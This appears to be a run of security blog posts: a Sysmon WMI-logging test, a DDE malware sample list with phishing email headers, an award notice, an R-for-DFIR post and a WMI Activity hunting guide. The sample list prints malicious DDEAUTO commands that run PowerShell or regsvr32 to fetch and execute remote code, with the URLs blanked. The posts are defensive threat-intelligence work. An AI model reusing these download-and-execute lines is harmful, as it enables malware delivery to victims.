  • Event ID 19: WmiEvent (WmiEventFilter activity detected). When a WMI event filter is registered, which is a method used by malware to execute, this event logs the WMI namespace, filter name and filter expression.
  • Event ID 20: WmiEvent (WmiEventConsumer activity detected). This event logs the registration of WMI consumers, recording the consumer name, log, and destination.
  • Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected). When a consumer binds to a filter, this event logs the consumer name and filter path

In version 6.10 it tracks the creation and deletion of __EventFilter Class, Any Consumer Type Class and __FilterToConsumerBinding Class. 

For looking at the events it captures lest create a sample configuration file that will log WMI Events. The configuration file is the following:

<Sysmon schemaversion="3.4">
 <WmiEvent onmatch='exclude'>

We can save this file as test.xml and apply it by running sysmon -c .\test.xml from a cmd or PowerShell console running as administrator. When we run sysmon -c to list the configuration we should see something like this:

System Monitor v6.10 - System activity monitor
Copyright (C) 2014-2017 Mark Russinovich and Thomas Garnier
Sysinternals -

Current configuration:
 - Service name:                  Sysmon
 - Driver name:                   SysmonDrv
 - HashingAlgorithms:             SHA256
 - Network connection:            disabled
 - Image loading:                 disabled
 - CRL checking:                  disabled
 - Process Access:                disabled

Rule configuration (version 3.40):
 - WmiEvent                           onmatch: exclude
 - WmiEvent                           onmatch: exclude
 - WmiEvent                           onmatch: exclude

We will use Windows PowerShell to create a permanent event that will track service changes in state in to a text file. 

We start by creating a __EventFilter that will check for a modification of the Win32_Service class every 5 seconds. 

#Creating a new event filter
$ServiceFilter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance()

# Set the properties of the instance
$ServiceFilter.QueryLanguage = 'WQL'
$ServiceFilter.Query = "select * from __instanceModificationEvent within 5 where targetInstance isa 'win32_Service'"
$ServiceFilter.Name = "ServiceFilter"
$ServiceFilter.EventNamespace = 'root\cimv2'

# Sets the intance in the namespace
$FilterResult = $ServiceFilter.Put()
$ServiceFilterObj = $FilterResult.Path

Once the event is created we see that a Event 19 is create and under EventData we wee a Data element where the Operation attribute says Created. 


Since I know that some APT groups associated to state actors are known not modify existing permanent events to blend in target environments I decided to test modifying the current filter Query to see if it logged the action with the following actions in the PowerShell window: 

$ServiceFilter.Query = "select DisplayName from __instanceModificationEvent within 5 where targetInstance isa 'win32_Service'"
$FilterResult = $ServiceFilter.Put()

The creation was logged under Event Id 19. We can see that under Operation it is blank now, this means there is no logic in 6.10 to track modification but it still logs an action we can filter and trigger on. I informed one of the developers at Microsoft about this and they will address this in the next release of Sysmon for all log types. 


Lets create now a consumer that will create a log file on the C:\ drive with the following Windows PowerShell Code in the existing window where we created the filter. 

#Creating a new event consumer
$LogConsumer = ([wmiclass]"\\.\root\subscription:LogFileEventConsumer").CreateInstance()

# Set properties of consumer
$LogConsumer.Name = 'ServiceConsumer'
$LogConsumer.Filename = "C:\Log.log"
$LogConsumer.Text = 'A change has occurred on the service: %TargetInstance.DisplayName%'

# Sets the intance in the namespace
$LogResult = $LogConsumer.Put()
$LogConsumerObj = $LogResult.Path

We can see the LogFileEventConsumer creation was logged with Event Id 20 and all properties of it where parsed under EventData Element of the log structure.


Lets create a __FilterToConsumerBinding class instance using the __EventFilter and the LogFileEventConsumer class instance we created earlier. 

# Creating new binder
$instanceBinding = ([wmiclass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()

$instanceBinding.Filter = $ServiceFilterObj
$instanceBinding.Consumer = $LogConsumerObj
$result = $instanceBinding.Put()
$newBinding = $result.Path

The action is logged with Event Id 21 and that the Filter and Consumer paths in the CIM Database are included under EventData. 



In conclusion I can say that the logging in Sysmon expands on what we can already log in the newer versions of Windows and it provides better consistency and insight on Permanents type events and their components that the current Windows logging does not. It does not over temporary events, providers or query errors but it is a great start. I would recommend to simply enable logging of all events associated with WMI permanent events and to not filter in the configuration file since their creation is not common on aday to day operation and their modification is very rare so the simple presence of the events is enough to warrant a look in a production environment. 

DDE Command Execution malware samples

Here are a few samples related to the recent DDE Command execution

10/18/2017 InQuest/yara-rules 


File information
List of available files:
Word documents:


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"\";IEX((new-object net.webclient).downloadstring('')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"\";IEX((new-object net.webclient).downloadstring('')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p:// scrobj.dll" "For Security Reasons")

7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object'');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp

9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp

10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc

Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload

Message information

For the EDGAR campaign

 Received: from ( [])
by with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by with local (Exim 4.89)
(envelope-from <>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: for,
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <>
Reply-To: EDGAR <>
Message-ID: <>
X-Mailer: PHPMailer 5.2.22 (
MIME-Version: 1.0
Content-Type: multipart/mixed;
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname -
X-AntiAbuse: Original Domain -
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain -
X-Get-Message-Sender-Via: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

This is a multi-part message in MIME format.

Content-Type: multipart/alternative;

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>


Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx



for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct 2017 10:45:15 +0000
Received: from
 (2603:10a6:800:a9::33) by
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from (2a01:111:f400:7e04::133) by (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> ( by
 <snip>( with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> ( by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from (unknown []) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from (localhost []) by (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain []) by (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from (
 []) by (envelope-sender
 <>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
Received: from authenticated-user ( [])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
received-spf: Fail ( domain of <snip> does
 not designate as permitted sender); client-ip=;
x-scanned-by: MailControl 44278.1987 ( on
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
MIME-Version: 1.0

McRee added to ISSA’s Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

toolsmith #128 – DFIR Redefined: Deeper Functionality for Investigators with R – Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us, we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With a very few lines of R investigators might be more quickly able to reach conclusions.
All the code described in the post can be found on my GitHub.

Have you been pwned?

This scenario I covered in an earlier post, I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principle is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to is TraMineR: Trajectory Miner for R. This package is for mining, describing and visualizing sequences of states or events, and more generally discrete sequence data. It's primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow though, the project page somehow fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from above mentioned paper. Figure 1 are text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.

Basics of Tracking WMI Activity

WMI (Windows Management Instrumentation) has been part of the Windows Operating System since since Windows 2000 when it was included in the OS. The technology has been of great value to system administrators by providing ways to pull all types of information, configure components and take action based on state of several components of the OS. Due to this flexibility it has been abused by attackers that saw its potential since it early inclusion in the OS.

As security practitioners it is one of the technologies on Microsoft Windows that is of great importance to master. Until recently there was little to now logging of the actions one could take using WMI. Blue Teams where left leveraging third party tools or coding their own solution to cover gaps, this allowed for many year the abuse of WMI by Red Teams simulating the very actions that attackers of all kind have used in their day to day operation. We will take a look at how Microsoft improved the logging of WMI actions.

The WMI Activity Provider

The WMI Activity eventlog provider in Windows until 2012 was mostly for logging debug and trace information for WMI when it was enabled. It was expanded with this release of Windows to have an Operational log that logged several actions. Lets take a look at the provider it self and what does it offer. For this we will use PowerShell and in it the Get-WinEvent cmdlet to get the information.

We start by getting the object representing the provider:

PS C:\> $WmiProv = Get-WinEvent -ListProvider "Microsoft-Windows-WMI-Activity"
PS C:\> $WmiProv

Name     : Microsoft-Windows-WMI-Activity
LogLinks : {Microsoft-Windows-WMI-Activity/Trace, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-WMI-Activity/Debug}
Opcodes  : {}
Tasks    : {}

PowerShell formats the output of this object so we need to use the Format-List parameter to see all properties and which have values set on them.

PS C:\> $WmiProv | Format-List -Property *

ProviderName      : Microsoft-Windows-WMI-Activity
Name              : Microsoft-Windows-WMI-Activity
Id                : 1418ef04-b0b4-4623-bf7e-d74ab47bbdaa
MessageFilePath   : C:\WINDOWS\system32\wbem\WinMgmtR.dll
ResourceFilePath  : C:\WINDOWS\system32\wbem\WinMgmtR.dll
ParameterFilePath :
HelpLink          : Corporation&ProdName=Microsoft® Windows® Operating
DisplayName       : Microsoft-Windows-WMI-Activity
LogLinks          : {Microsoft-Windows-WMI-Activity/Trace, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-WMI-Activity/Debug}
Levels            : {win:Error, win:Informational}
Opcodes           : {}
Keywords          : {}
Tasks             : {}
Events            : {1, 2, 3, 11...}

Lets take a look at the LogLinks or where does the provider saves its events.

PS C:\> $WmiProv.LogLinks

LogName                                    IsImported DisplayName
-------                                    ---------- -----------
Microsoft-Windows-WMI-Activity/Trace            False
Microsoft-Windows-WMI-Activity/Operational      False
Microsoft-Windows-WMI-Activity/Debug            False

The one we are interested in is the Microsoft-Windows-WMI-Activity/Operational one. Now that we have identified the specific EventLog name for which we are interested in the events that will be saved there we can now take a look at the events the provider generates.

A event provider can generate from a few events to over a 100. So look at how many events the provider generates using the Measure-Object cmdlet

PS C:\> $WmiProv.Events | Measure-Object

Count    : 22
Average  :
Sum      :
Maximum  :
Minimum  :
Property :

We see that the provider generates 22 events. We take a look at how each object is composed using the Get-Member cmdlet.

PS C:\> $WmiProv.Events | Get-Member

   TypeName: System.Diagnostics.Eventing.Reader.EventMetadata

Name        MemberType Definition
----        ---------- ----------
Equals      Method     bool Equals(System.Object obj)
GetHashCode Method     int GetHashCode()
GetType     Method     type GetType()
ToString    Method     string ToString()
Description Property   string Description {get;}
Id          Property   long Id {get;}
Keywords    Property   System.Collections.Generic.IEnumerable[System.Diagnostics.Eventing.Reader.EventKeyword] Keywords {get;}
Level       Property   System.Diagnostics.Eventing.Reader.EventLevel Level {get;}
LogLink     Property   System.Diagnostics.Eventing.Reader.EventLogLink LogLink {get;}
Opcode      Property   System.Diagnostics.Eventing.Reader.EventOpcode Opcode {get;}
Task        Property   System.Diagnostics.Eventing.Reader.EventTask Task {get;}
Template    Property   string Template {get;}
Version     Property   byte Version {get;}

We can see that each event has a LogLink property and the value is of type System.Diagnostics.Eventing.Reader.EventLogLink. The value is an object of it self. We can quickly take a peak in to the object to see what the values are and how they are formated.

PS C:\> $WmiProv.Events[0].LogLink

LogName                              IsImported DisplayName
-------                              ---------- -----------
Microsoft-Windows-WMI-Activity/Trace      False

PS C:\> $WmiProv.Events[0].LogLink | gm

   TypeName: System.Diagnostics.Eventing.Reader.EventLogLink

Name        MemberType Definition
----        ---------- ----------
Equals      Method     bool Equals(System.Object obj)
GetHashCode Method     int GetHashCode()
GetType     Method     type GetType()
ToString    Method     string ToString()
DisplayName Property   string DisplayName {get;}
IsImported  Property   bool IsImported {get;}
LogName     Property   string LogName {get;}

We can now filter for the events we want to take a look at.

PS C:\> $WmiProv.Events | Where-Object {$_.LogLink.LogName -eq "Microsoft-Windows-WMI-Activity/Operational"}

Id          : 5857
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="ProviderName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Code" inType="win:HexInt32" outType="win:HexInt32"/>
                <data name="HostProcess" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ProcessID" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="ProviderPath" inType="win:UnicodeString" outType="xs:string"/>

Description : %1 provider started with result code %2. HostProcess = %3; ProcessID = %4; ProviderPath = %5

Id          : 5858
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="Id" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ClientMachine" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ClientProcessId" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="Component" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Operation" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ResultCode" inType="win:HexInt32" outType="win:HexInt32"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Id = %1; ClientMachine = %2; User = %3; ClientProcessId = %4; Component = %5; Operation = %6; ResultCode = %7; PossibleCause = %8

Id          : 5859
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="NamespaceName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Query" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="processid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="providerName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="queryid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; NotificationQuery = %2; OwnerName = %3; HostProcessID = %4;  Provider= %5, queryID = %6; PossibleCause = %7

Id          : 5860
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="NamespaceName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Query" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="processid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="MachineName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; NotificationQuery = %2; UserName = %3; ClientProcessID = %4, ClientMachine = %5; PossibleCause = %6

Id          : 5861
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="Namespace" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ESS" inType="win:UnicodeString" outType="xs:string"/>
                <data name="CONSUMER" inType="win:UnicodeString" outType="xs:string"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; Eventfilter = %2 (refer to its activate eventid:5859); Consumer = %3; PossibleCause = %4

We can now see the events that are specific for that eventlog. We can also see the amount of details we can get for each event, including the XML template for the message. This will be useful when we write XPath filters.

We can save them to a variable and pull the IDs for the events.

PS C:\> $WmiEvents = $WmiProv.Events | Where-Object {$_.LogLink.LogName -eq "Microsoft-Windows-WMI-Activity/Operational"}
PS C:\> $WmiEvents | Select-Object -Property Id



Provider Loading

Every time WMI is initialized it loads providers that will build the classes and provide access to the OS and System components that it exposes as classes and its instances. This provides executes under the context of SYSTEM in the user, in other words they execute with a very high privilege in Windows. Several actors and Red Teams leverage malicious providers as backdoor so as as to keep persistent access on systems.  Many forensic and incident response team do not look for new providers being added on systems or for suspicious exiting ones. Some examples of malicious providers are:

In the list of Event Id we saw this would be event 5857 and it's structure we have some very useful information that is of great help when hunting. 


As we can see in its structure we have information on the ProcessID and Thread that loaded the provider, we can also see the name of the host process name and the path to the DLL loaded. 

If we are using Windows Event Collector we can create an XML filter with known providers and filters those out so we only see new unseen providers . We can generate a quick list of the unique privider files with a bit of PowerShell

PS C:\> Get-WinEvent -FilterHashtable @{logname='Microsoft-Windows-WMI-Activity/Operational';Id=5857} | % {$[4].value} | select -unique

We can turn this in to a XML Filter that we can use either with Get-WinEvent while hunting or WEC for collection

  <Query Id="0" Path="Microsoft-Windows-WMI-Activity/Operational">
    <Select Path="Microsoft-Windows-WMI-Activity/Operational">*[System[(EventID=5857)]]
    <Suppress Path="Microsoft-Windows-WMI-Activity/Operational">
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmiprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmipcima.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\sppwmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\vdswmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\DMWmiBridgeProv.dll']) or
    (*[UserData/*/ProviderPath='C:\Windows\System32\wbem\WmiPerfClass.dll']) or
    (*[UserData/*/ProviderPath='C:\Windows\System32\wbem\krnlprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmipiprt.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\stdprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\profprov.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\Win32_DeviceGuard.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\smbwmiv2.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\cimwin32.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmiprvsd.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\wbem\scrcons.exe']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\wbem\wbemcons.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\vsswmi.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\tscfgwmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\ServerManager.DeploymentProvider.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\mgmtprovider.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\ntevt.dll']) or
    <Suppress Path="Microsoft-Windows-WMI-Activity/Operational">
    (*[UserData/*/ProviderPath='%windir%\system32\wbem\servercompprov.dll']) or

WMI Query Errors

EventLog Id 5858 logs all query errors, the data include the error code in the element ResultCode and the Query that caused it under the element Operation. The Process Id is also included but in this event it is under the ClientProcessId element. 


The error code is in hex format. Thankfully Microsoft has a list of WMI Error Constants in MSDN that we can use to figure what the specific error was. We can query easily for specific result codes using an XPathFilter. In the following exampled we are looking for queries that failed because the specified Class did not exist searching for ResultCode 0x80041010. This could useful if an attacker is looking for a specific class present on the systems. Like a permanent event consumer he can modify for persistence.

PS C:\> Get-WinEvent -FilterXPath "*[UserData/*/ResultCode='0x80041010']" -LogName "Microsoft-Windows-WMI-Activity/Operational"

We could also search for queries that failed due to insufficient permissions.

PS C:\> Get-WinEvent -FilterXPath "*[UserData/*/ResultCode='0x80041003']" -LogName "Microsoft-Windows-WMI-Activity/Operational"


